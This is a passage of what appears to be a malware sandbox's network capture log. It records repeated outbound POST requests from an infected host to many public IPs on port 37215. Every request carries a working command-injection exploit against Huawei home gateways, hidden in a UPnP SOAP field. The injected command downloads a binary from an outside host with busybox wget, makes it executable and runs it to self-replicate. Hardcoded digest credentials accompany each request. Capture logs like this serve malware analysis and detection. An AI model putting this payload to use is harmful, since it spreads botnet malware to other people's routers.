                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  172192.168.2.135975041.7.240.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665086031 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  173192.168.2.1354178157.40.112.537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665119886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  174192.168.2.1334860157.141.31.20037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665170908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  175192.168.2.1335574157.45.129.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665177107 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  176192.168.2.1340782197.162.97.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665242910 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  177192.168.2.1347604197.116.122.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665302038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  178192.168.2.1346818197.83.108.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665339947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  179192.168.2.1351262163.147.67.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665347099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  180192.168.2.135696041.24.3.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665381908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  181192.168.2.1344934197.219.225.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.665412903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 